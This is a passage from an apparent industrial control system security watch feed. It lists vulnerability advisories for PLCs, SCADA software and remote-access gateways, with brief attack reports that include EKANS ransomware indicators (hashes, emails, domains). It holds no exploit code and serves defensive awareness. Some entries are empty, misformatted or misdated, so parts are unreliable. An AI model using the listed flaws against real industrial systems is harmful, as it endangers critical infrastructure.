- M340 Communication Ethernet modules BMX NOE 0100 (H) versions prior to 3.3, BMX NOE 0110 (H) versions prior to 6.5, BMX NOC 0401 versions prior to 2.10
- Premium processors with integrated Ethernet COPRO (TSXP574634, TSXP575634, TSXP576634) versions prior to 6.1
- Premium communication modules TSXETY4103 versions earlier than 6.2, TSXETY5103 versions earlier than 6.4
- Quantum processors with integrated Ethernet COPRO 140CPU65xxxxx versions prior to 6.1
- Quantum communication modules 140NOE771x1 versions previous to 7.1, 140NOC78x00 versions previous to 1.74, 140NOC77101 versions previous to 1.08

Vulnerability risks:
- Remote execution of arbitrary code
- Denial of Service
- Bypassing the security policy
- Data Integrity Breaches
- Breach of confidentiality of data

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] LCDS LAquis SCADA

14/10/2020

Vulnerability affects :
- LCDS LAquis SCADA - versions prior to 4.3.1.870.

Vulnerability risks:
-  execute code under the privileges of the application

See the documents below for more information
Sources :

[VULNERABILITY] FieldComm

14/10/2020

Vulnerability affects :
- HART-IP Developer kit – version 1.0.0.0
- hipserver – versions prior to v3.7.0

Vulnerability risks:
- Bufferoverflow
- Authentication bypass

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Moxa Nport IAW5000A-I/O

14/10/2020

Vulnerability affects :
- Moxa NPort IAW5000A-I/O Series Serial Device Servers – versions 2.1 and prior

Vulnerability risks:
- hijack the session by stealing the user’s cookies
- privilege escalation
- Authentification bypass

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] multiple vulnerability in Siemens product

14/10/2020

Vulnerability affects :
- Multiple Web Application Vulnerabilities in Desigo Insight
- Authentication Bypass Vulnerability in SIPORT MP
- Improper Password Protection during Authentication in SIMATIC S7-300 and S7-400 CPUs and Derived Products
- Vulnerabilities in Intel CPUs (November 2019)
- Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP
- WIBU Systems CodeMeter Runtime Vulnerabilities in Siemens and Siemens Energy Products
- Vulnerability known as TCP SACK PANIC in Industrial Products
- Special Register Buffer Data Sampling (SRBDS) aka Crosstalk in Industrial Products
- DNSMasq Vulnerabilities in SCALANCE W1750D, SCALANCE M-800 / S615 and RUGGEDCOM RM1224

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] PCvue, WebVue, WebScheduler, TouchVue

13/10/2020

Vulnerability affects PCvue :
- ARC Informatique PcVue 12.0.7 (including) through 12.0.17 (excluding)
- ARC Informatique PcVue 8.10 (including) through 12.0.17 (excluding)
- WebVue, the WebScheduler or the TouchVue

Vulnerability risks:
- DoS
- RCE

PoC exist for exploit this vulnerabilities.
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric MELSEC iQ-R Series

08/10/2020

Vulnerability affects MELSEC iQ-R series modules :
- R00/01/02CPU: Firmware Versions 7 or earlier
- R04/08/16/32/120CPU, R04/08/16/32/120ENCPU: Firmware Versions 39 or earlier
- R08/16/32/120SFCPU: Firmware Versions 20 or earlier
- R08/16/32/120PCPU: Firmware Versions 24 or earlier
- R08/16/32/120PSFCPU: Firmware Versions 05 or earlier
- Versions 49 or earlier

Vulnerability risks:
-  denial-of-service condition due to uncontrolled resource consumption

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Johnson Controls Sensormatic Electronics American Dynamics victor Web Client

08/10/2020

Vulnerability affects :
- American Dynamics victor Web Client: All versions up to and including v5.4.1

Vulnerability risks:
- DoS
- RCE (delete arbitrary files on the system)

See the documents below for more information
Sources :
CVE :

[ATTACK] Azerbaijan is the target of attack on its energy infrastructure

06/10/2020

These campaigns mainly target wind turbines and the public energy sector in Azerbaijan.
Sources :

[ATTACK] Phishing campaigns against Russian companies

06/10/2020

Spear phishing campaigns threaten Russian fuel andenergy companies
Sources :

[VULNERABILITY] Stormshield Network Security (SNi40 and SNi20)

05/10/2020

Vulnerability affects:
- Stormshield Network Security (SNS) versions prior to 4.1.1 (check)

Vulnerability risks:
- Remote denial of service
- Data privacy breach
- Privilege escalation

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] WideFieled3 - Yokogawa

03/10/2020

Vulnerability affects:
- WideFieled3 R1.0 1 - R4.0

Vulnerability risks:
- Buffer overflow by loading malicious projects and terminate the application abnormally
Sources :
CVE :

[VULNERABILITY] mymbCONNECT24 and mbCONNECT24 - MB Connect Line

02/10/2020

Vulnerability affects:
- mymbCONNECT24 v2.6.1 and prior
- mbCONNECT24 v2.6.1 and prior

Vulnerability risks:
- Cross-Site Request Forgery
- SQL injection
 -Remote code execution

Sources :
CVE :
  • [EN] CVE-2020-24569
  • [EN] CVE-2020-24568
  • [EN] CVE-2020-24570

    [VULNERABILITY] SiteManager GateManager

    02/10/2020 ``` Vulnerability affects:

  • SiteManager all versions prior to v9.2.620236042
  • GateManager 4260 and 9250 all versions prior to v9.0.20262
  • GateManager 8250 all versions prior to v9.2.620236042

Vulnerability risks:


> ###### Sources :
- [EN] [OTORIA](https://www.otorio.com/news-events/press-release/otorio-discovers-critical-vulnerabilities-in-leading-industrial-remote-access-software-solutions/)
- [EN] [The Hacker News](https://thehackernews.com/2020/10/industrial-remote-access.html)
- [EN] [CISA](https://us-cert.cisa.gov/ics/advisories/icsa-20-273-03)
- [DE] [CERT DE](https://cert.vde.com/de-de/advisories/vde-2020-035)
- [EN] [BR AUTOMATION](https://www.br-automation.com/downloads_br_productcatalogue/assets/1600003183756-de-original-1.0.pdf)

> ###### CVE :
> - [EN] [CVE-2020-11641](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11641)
> - [EN] [CVE-2020-11642](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11642)
> - [EN] [CVE-2020-11643](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11643)
> - [EN] [CVE-2020-11644](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11644)
> - [EN] [CVE-2020-11645](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11645)
> - [EN] [CVE-2020-11646](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11646)

---
## [VULNERABILITY] Cisco IOS Software
_25/09/2020_

Vulnerability affects:

Vulnerability risks:

If this command returns information, the equipment is vulnerable: show control-plane host open-ports


> ###### Sources :
- [FR] [ANSSI](https://www.cert.ssi.gouv.fr/avis/CERTFR-2020-AVI-602/)
- [EN] [Cisco](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ios-lpwa-access-cXsD7PRA)

> ###### CVE :
> - [EN] [CVE-2020-3426](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3426)


---
## [RESSOURCES] 
_25/09/2020_

> [EN] [Kaspersky ICS CERT](https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf)

The report looks back at the WildPressure campaign in the Middle East with the Milum malware. Kaspersky also returns to the campaign against Azerbaijan with the RAT PoetRAT and the attacks on water plants in Israel.

---

## [VULNERABILITY] Wibu-Systems AG
_25/09/2020_

Vulnerability affects this vendor:

Vulnerability risks:

CVE :

[VULNERABILITY] Siemens

11/08/2020

Vulnerability affects:
- RUGGEDCOM RM1224 versions prior to 6.3
- SCALANCE M-800 / S615 versions prior to 6.3
- Desigo CC versions V4.x without the latest security patch
- Desigo CC versions V3.x without the latest security patch
- Desigo CC Compact versions V4.x without latest security patch
- Desigo CC Compact versions V3.x without latest security patch
- SICAM WEB firmware for SICAM A8000 RTUs versions prior to V05.30
- Automation License Manager versions prior to V6.0.8
- SIMATIC RF350M
- SIMATIC RF650M
- SIMOTICS CONNECT 400

Vulnerability risks:
- Remote execution of arbitrary code
- Data Integrity Breaches
- Breach of confidentiality of data
- Elevation of privileges
- Indirect remote code injection (XSS)
Sources :
CVE :

[VULNERABILITY] Schneider Electric

11/08/2020

Vulnerability affects:
- APC Easy UPS On-Line versions prior to V2.1
- Schneider Electric Modbus Serial Driver (64 bit) versions prior to V3.20 IE 30
- Schneider Electric Modbus Serial Driver (32 bit) versions prior to V2.20 IE 30
- Schneider Electric Modbus Driver Suite versions prior to V14.15.0.0
- spaceLYnk versions prior to V2.5.1
- Wiser for KNX (formerly homeLYnk) versions prior to V2.5.1
- PowerChute Business Edition versions prior to V9.1
- SoMove versions prior to V2.8.2
- Harmony eXLhoist versions prior to V04.00.03.00
- Modicon M218 Logic Controller versions prior to V5.0.0.8

Vulnerability risks:
- Remote execution of arbitrary code
- Remote denial of service
- Circumvention of security policy
- Breach of confidentiality of data
- Elevation of privileges
CVE :
Sources :

[VULNERABILITY] Schneider Electric Triconex

31/07/2020

The following equipment is affected by several vulnerabilities (RCE, DoS and data leak) :
 - TriStation 1131 versions prior to 4.13.0
 - Tricon TCM Model 4351, 4352, 4351A/B and 4352A/B versions prior to 10.5.4
CVE :
Sources :

[VULNERABILITY] Industrial VPN servers

28/07/2020

The following revenues are affected : 
- Secomea GateManager (RCE / DoS / Hard-coed credentials)
- Moxa EDR-G902/3 (RCE) 
- HMS Networks' eWon (RCE)
The most impactful attack allows to take full control of the equipment. According to the Shodan tool 253 instances of VPN are vulnerable.
 Secomea and Moxa patch are available.
CVE :
Sources :

[ATTACK] Cyber attack on Israeli water infrastructure

22/07/2020

The hackers would have targeted cellular routers in order to get into the systems.
The April attacks appeared to target several water and sewage treatment facilities.
/ast week's attacks were aimed at smaller water pumping systems in the agricultural sector./
According to Securityweek, the attackers managed to get into the system without causing significant damage.
The recent cyber attacks on a major Iranian port appear to be Israel's response, although neither side has admitted to launching an attack.
Sources :

[VULNERABILITY] Siemens

16/07/2020

The products affected are :
 - Opcenter Execution Discrete prior to v3.2
 - Opcenter Execution Foundation prior to v3.2
 - Opcenter Execution Process prior to v3.2
 - Opcenter Execution Core prior to v8.2
 - Opcenter Intelligence
 - Opcenter Quality prior to 11.3
 - Opcenter RD&L prior to 8.1
 - Camstar Enterprise Platform : a migration to Opcenter Execution Core 8.2 is required
 - SIMATIC IT LMS, Production Suite, Notifier Server for Windows, PCS neo
 - SIMATIC STEP 7 (TIA Portal) v15
 - SIMATIC STEP 7 (TIA Portal) v16 prior to V16 update 2
 - SIMOCODE ES and Soft Starter ES
 - SPPA-T3000 Application Server and Terminal Server
 - SPPA-T3000 APC UPS with NMC AP9630 or AP9631
 - SIMATIC S7-200 SMART CPU prior to V2.5.1
 - LOGO! 8 BM (and SIPLUS) prior to V1.81.04
 - LOGO! 8 BM (and SIPLUS) prior to V1.82.03
 - LOGO! 8 BM (and SIPLUS) prior to V1.82.04
 - SIMATIC S7-300 CPU (and ET200CPUs et SIPLUS) prior to V3.X.17
 - SIMATIC TDC CP51M1 prior to V1.1.8
 - SIMATIC TDC CPU555 prior to V1.1.1
 - SINUMERIK 840D sl prior to V4.8.6
 - SINUMERIK 840D sl prior to V4.94
 - SIMATIC HMI Basic Panels first and second generation, Comfort Panels, Mobile Panels second-generation (and SIPLUS)
 - SIMATIC HMI KTP700F Mobile Arctic
 - SIMATIC WinCC Runtime Advanced
 - SICAM MMU prior to V2.05
 - SICAM SGU
 - SICAM T prior to V2.18
CVE :
Sources :

[VULNERABILITY] Moxa MGate 5105-MB-EIP

14/07/2020

Two vulnerabilities have been discovered in the Moxa MGate 5105-MB-EIP product (Firmware Version 4.2 or lower)
CVE :
Sources :

[VULNERABILITY] Ripple20 - update

30/06/2020

New industrial equipment is vulnerable to Ripple20 :
    - FANUC Robotic
    - Control Techniques (NIDEC)
    - B&B Electronics      
    - Mitsubishi Electric       
    - Schweitzer Engineering     
Sources :

[ATTACK] French wind infrastructure attack

30/06/2020

The French newspaper l'Express revealed that a custom version of the Blackenergy malware had been discovered in the installations of a wind farm in Enedis.
Sources :

[VULNERABILITY] FactoryTalk - Rockwell Automation

24/06/2020

A vulnerability in the redundancy service (RdcyHost.exe) in FactoryTalk (Rockwell Automation) does not verify credentials. 
By exploiting this vulnerability an attacker can execute remote code with high privileges.
CVE :
Sources :

[VULNERABILITY] Mitsubishi Electric and its subsidiary ICONICS

23/06/2020

Several critical flaws have been discovered in Mitsubishi equipment and its subsidiary ICONICS.
The vulnerabilities allow remote code execution (RCE).
The following products are affected :
    GENESIS64
    Hyper Historian
    AnalytiX
    MobileHMI
    GENESIS32
    BizViz
The following pieces of equipment are also affected:
    MC Works64 Version 4.02C (10.95.208.31) and earlier, all versions
    MC Works32 Version 3.00A (9.50.255.02)
Sources :

[VULNERABILITY] OSIsoft PI System

22/06/2020

OTORIO researchers discovered an XSS stored in version 1.12.0.6346 and earlier of OSIsoft PI System (developed by PI System).
To exploit the vulnerability, it is necessary to have access to the storage engine of the PI Server.
Risks : phishing, privilege escalation.
A patch has been released. 
CVE :
Sources :

[VULNERABILITY] Ripple20

18/06/2020

Ripple20 vulnerabilities concerning the TCP/IP stack of Treck, Inc. 
These vulnerabilities impact notably Schneider Electric and Rockwell Automation equipment.
The list of assigned vendors is in the (source) article in JSOF.
CVE :
Sources :

18/06/2020

Cybereason


[VULNERABILITY] Multiple important vulnerabilities on Schneider-electric products

17/06/2020

Several Schneider-electric products are impacted by important vulnerabilities:
 - U.motion Servers (SQL Injection, Improper Access Control )
 - Touch Panels (SQL Injection, Improper Access Control )
 - Unity Loader (Hard-coded Credentials)
 - OS Loader Software (Hard-coded Credentials)
 - EcoStruxure Operator Terminal Expert 3.1 Service Pack 1 (Path Traversal, Argument Injection, SQL Injection)
 - GP-Pro EX V1.00 to V4.09.100 (Weak password)
 - Easergy T300 (Traffic interception, read configuration data,  third party components vulnerability, risky cryptographic algorithm, raad private keys, privileges elevation, delete files, full access by brute force, DoS, directory information exposure, execution code, CSRF )
 - Modicon M218 Logic Controller (DoS)
CVE :

[VULNERABILITY] Rockwell

15/06/2020

Multiple vulnerabilities have been discovered in RockWell Automation software.
The following products are impacted :
- FactoryTalk Linx versions 6.00, 6.10, and 6.11
- RSLinx Classic v4.11.00 and prior
- Connected Components Workbench: Version 12 and prior
- ControlFLASH: Version 14 and later
- ControlFLASH Plus: Version 1 and later
- FactoryTalk Asset Centre: Version 9 and later
- FactoryTalk Linx CommDTM: Version 1 and later
- Studio 5000 Launcher: Version 31 and later
- Studio 5000 Logix Designer software: Version 32 and prior
CVE :

[VULNERABILITY] Moxa EDR-G902/G903

15/06/2020

Moxa EDR-G902 and G903 Moxa products in version 5.4 or lower are affected by a stack buffer overflow vulnerability through the use of a malicious cookie. 
A patch has been released. 
Sources :

[VULNERABILITY] Mitsubishi Controllers MELSEC iQ-R

12/06/2020

This vulnerability impacts the MELSEC iQ-R CPU modules from Mitsubishi.
 The DOS attack impacts the operation of the PLC. Mitsubishi has released a patch.
CVE :

CVE-2020-13238

Sources :

[ATTACK] [RANSOMWARE] EKANS/SNAKE at Honda and Enel

10/06/2020

The EKANS/SNAKE ransom paralyses 11 Honda factories (5 in the USA, 2 in Brazil, India and Turkey).
This ransomware has features that target industrial systems.
In the case of Honda or Enel group, the RDP track open on the Internet is privileged. 

Publication FR : EKANS ransomware PDF

IOC EKANS/SNALE

General :

  • MAIL : bapcocrypt@ctemplar.com
  • SHA-256 : e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60

File at Honda :

  • MAIL : CarrolBidell@tutanota.com
  • SHA2-256 : d4da69e424241c291c173c8b3756639c654432706e7def5025a649730868c4a1
  • NDD : mds.honda.com

File at Enel :

  • MAIL : CarrolBidell@tutanota.com
  • SHA2-256 : edef8b955468236c6323e9019abb10c324c27b4f5667bc3f85f3a097b2e5159a
  • NDD : enelint.global
Règles YARA :

On Malpedia

MITRE ATT&CK TIDs :

On VMware carbonblack

Sources :

[VULNERABILITY] Schneider Electric Easergy

10/06/2020

 Multiple vulnerabilities on Schneider Electric Easergy T300 products earlier than 2.7 and Easergy Builder products earlier than 1.6.3.0.
 Risks :
  - Remote execution of arbitrary code
  - Remote denial of service
  - Data Integrity Breaches
  - Breach of confidentiality of data
  - Elevation of privileges
  - Injection of illegitimate rebound requests (SRFC)
CVE :

CVE-2020-7503 à CVE-2020-7519

Sources :

[VULNERABILITY] Siemens

09/10/2020

Multiples Siemens dans les SIMATIC, SINEMA, SINUMERIK, SINUMERIK et LOGO! 8 BM.
- Remote execution of arbitrary code
- Denial of Service
- Circumvention of security policy
- Data Integrity Breaches
- Breach of confidentiality of data
CVE :
  • CVE-2020-7580
  • CVE-2020-7585 and CVE-2020-7586
  • CVE-2020-7589
  • CVE-2018-15361
  • CVE-2019-8258 to CVE-2019-8277
  • CVE-2019-8280
Sources :